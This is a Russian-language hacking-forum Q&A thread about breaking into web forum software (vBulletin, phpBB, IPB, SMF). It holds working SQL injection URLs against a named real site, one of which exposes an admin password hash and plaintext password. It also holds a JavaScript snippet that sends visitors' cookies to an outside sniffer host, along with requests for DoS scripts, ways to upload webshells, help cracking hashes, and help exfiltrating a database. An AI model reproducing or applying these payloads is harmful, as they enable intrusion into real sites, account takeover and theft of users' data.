|
[Задай Вопрос - Получи Ответ]
Внимание! Данная тема предназначена для Ваших вопросов. Создавать темы, посвященные какому - либо вопросу - не нужно, все спрашиваем тут, в переделах тематики раздела. Созданные темы, содержащие вопрос будут удаляться, как оффтоп |
Выложили Dos скрипт для Vbulletin, но я никак не могу разобраться для какой он версии и какие параметры должны быть, чтобы он сработал. Поможете?(Там идет нагрузка на поиск, но это же вроде старьё, и Jelsoft давно это все фиксануло)
http://forum.antichat.ru/showpost.php?p=811052&postcount=48 |
Цитата:
2. Какие параметры?, это видно из исходника сплоента: Код:
if (@ARGV < 2) { &usage; }perl c:/1.pl www.test1.ru /forum/ Обрати внимание имя директории с форумом должно быть вместе с двумя слешами (в начале и конце имени), это видно по тому как формируется пакет: Код:
$foo = "POST ".$dir."search.php HTTP/1.1\r\n".P.S. по поводу того что это старье - тут нечему удивлятся, тем кто копипастит всё это глубого побарабану новое оно или старое, а про описание я вообще промолчу. |
гугл сказал что это для версии vBulletin <= 3.6.3
|
всем хай,научите новичка sql инъекции... плиз
|
по моему самый лучший мануал по Скулям http://forum.antichat.ru/showthread.php?t=43966
юзай поиск то |
Привет всем :)
Подскажите как можно узнать префикс таблиц на атакуемом сайте? вот ссылочка:http://www.hardvision.ru/index.php3 to=files&action=showCateg&cid=-233+union+select+1,2,3+from+har_user/* там проходит sql инъекция , как ни пробовал по логики от названия сайта , не получается. Может есть какие команды? |
Я не знаю где написать решили тут...
Короче есть в городе провайдер я к нему подключён, он представляет форум внутри сети , но войти может только с подключением внешки который имеет ип вида ***.**.**.**, а Ip сетевой предоставленной провайдером вид 10.*.*.***, так вот вопрос можно ли войти в форум не включай внехи а просто по локалке ? |
Цитата:
http://www.hardvision.ru/index.php3?to=files&action=showCateg&cid=-233+union+select+1,table_name,3+from+information_s chema.tables+limit+17,1/* |
Попробовал ввел Вашу строчку , но ни чего не отобразилось, нет префикса
|
Цитата:
2 Убрать пробелы из урла 3 Префикс к чему? В schema находится ВСЯ информация обо ВСЕХ таблицах и колонках К посту ниже: Выполни Все рекоммендации :) |
Так со статьями понятно, читаем) но есть непонятки)
с schema понятно спасибо а пробелов нет урл, ничего не отображается, я скопировал Вашу строчку , но ничего нет |
Цитата:
http://www.hardvision.ru/index.php3?to=files&action=showCateg&cid=-233+union+select+1,concat_ws(0x3a,nick,passwd),3+f rom+foto.admin_table+where+id=1/* digit:30bf4fb4729f382ca2010fd445f1796d:mityap123 http://www.hardvision.ru/admin/ http://www.hardvision.ru/index.php3?to=files&action=showCateg&cid=-233+union+select+1,concat_ws(0x3a,nick,passw),3+fr om+foto.users+limit+0,1/* |
Доброго времени суток.
У меня такая проблема на одном форуме IPB 2.1.6 с помощью эксплоита я нашел хеши, но куки требует ещё и сесион_айди, в экплоите он не может всё время говорит что-то типа зайдите попозже сейчас not exist. Пожайлуста укажите где можно прочитать про расшифровку хэшей, более или менее поятно. Если же толку нет расшифровывать то значит придется через xss пробовать чтоли? Но там с регистрацией проблемы стоит жесткий контроль на каждого регистрирующегося. |
Цитата:
|
sher_or_wer, сессию можно достать только когда юзер, который тебе нужен в онлайне, если не ошибаюсь. А хэши можно расшифровать на milw0rm.com и hashcracking.info. Или можешь побрутить сам с помощью PasswordsPro.
|
Спасибо за ответы ~!DoK_tOR!~ и n0ne
|
кто каким способом заливает в пхпбб вебшелл?
конкретно под phpBB 2.0.21 нужно |
Цитата:
_http://forum.antichat.ru/thread24488.html |
Цитата:
http://forum.antichat.ru/showpost.php?p=198446&postcount=3 результата не далт смысл тыкать на тему, которая ниже этой? нету других способов\не знаешь так и пиши :confused: |
Цитата:
|
Цитата:
конкретно ПОД phpBB 2.0.21 нужно (так как способы для версий выше могут не подойти) и причем тут твой пост? |
Буду краток. Сайт phenomen.ru не регистрирует пользователей на своём ресурсе, во избежание хакерских нападений. Возможно ли проникнуть без регистрации на его территорию.
P.S. Как? |
народ нид хелп, какая версия ipb скажите плз: www.boards.warhead.ru
|
Цитата:
|
сенкс за ответ))
а народ, вот тема такая, в булке(vbulletin) версии 3.6.7 можно засунуть html в подпись(ну так во всяком случае на сайте одном), ятуда сую снифер - традиционно через ява скрипт, жду пол часа иду в лог снифера и что я вижу: все куки кроме id и пароля((( пишу знач вот так: <script>img = new Image(); img.src = "http://na-s.ru/images/kirufka_1.gif?"+document.cookie;</script> Адрес айта снифера: http://na-s.ru |
kirufka, значит смотрит гость
|
а если смотрю я сам?)))
Вот щас проверил - написал себе самому в личку сообщение предварительно удалив лог снифера... В снифере появился один "пост", в нем все про меня, но по прежнему нету пароля и айди( |
Цитата:
|
Всем Привет!
Интересует флудер для форума vBulletin 3.6.9 Нужно чтобы он в заданом разделе создавал темы с сообшениями, через определёное (указаное мной) время. Есть ли такие? :) |
Привет всем, возник такой вопрос : получил доступ в админку форума на SMF 1.1.4, хочу снять базу. Если выбираю сжатие базы, то сервер скидает чехлы около минуты, а потом вылетает "Internal Server Error
The server encountered an internal error or misconfiguration and was unable to complete your request. Please contact the server administrator to inform of the time the error occurred and of anything you might have done that may have caused the error. More information about this error may be available in the server error log." (я считаю, что стоит ограничение на время выполнения пхп скрипта). Если выбираю опцию не сжимать базу, то дает скачать около 1 мб, а дальше процесс глохнет (причем независимо от того, сколько прошло времени (размер от 700 кб до 1.2 Мб)), такое ощущение что стоит ограничение и на размер выкачанной базы. Подскажите, что делать? Как это можно обойти .P.S. Сливаю шелл, но запустить его не могу, так как вылетает ошибка вида : File "/var/www/vhosts/xxx.xxx/httpdocs/forum/Themes/blackted/images/smile.php" is writeable by group |
Цитата:
|
Попытался выполнить эксплоит Invision Power Board <= 2.3.5 Multiple Vulnerabilities правленный Elekt на localhoste говорит что нет уязвимости(условия вроде бы искуственно созданы для уязвимости) по сцылке http://localhost/ipb/index.php?s=&act=xmlout&do=check-display-name&name=%2527 выдаёт notfound почемуто.
|
Есть вопрос по поводу Powered by SMF 1.1.5 , кароче нашёл форум этой версии , но про баги в сети ни слова , правда читал на секьюрити лаб вот тут http://www.securitylab.ru/vulnerability/356091.php , написано уязвимость присутствует в версиях до 1.0.13 и 1.1.5 , но а какая именно не написано ((Зарегался я на форуме , в профиле оказывается мона аватар через урл вставлять пишу : http://old.antichat.ru/cgi-bin/s.jpg , захожу на лог сниффака вижу проснифалось , но только QUERY пустая (( Кароче мож кто знает какаю нить уязвимость в этой версии форума , подскажите !
|
Подскажите какой форум самый безопасный?
|
Цитата:
|
vBulletin
|
Скачал phpbb 2.0.13 с sourceforge - пиздец! Сплоиты не работают, highight баг не работает! http://localhost/phpbb2.0.13/viewtopic.php?t=1&highlight=phpinfo(); - ЧЯДНТ? Где взять бажную старую версию?
|
Цитата:
|
Ребята подскажите как один форум переадресовать на другой!
|
| Время: 18:32 |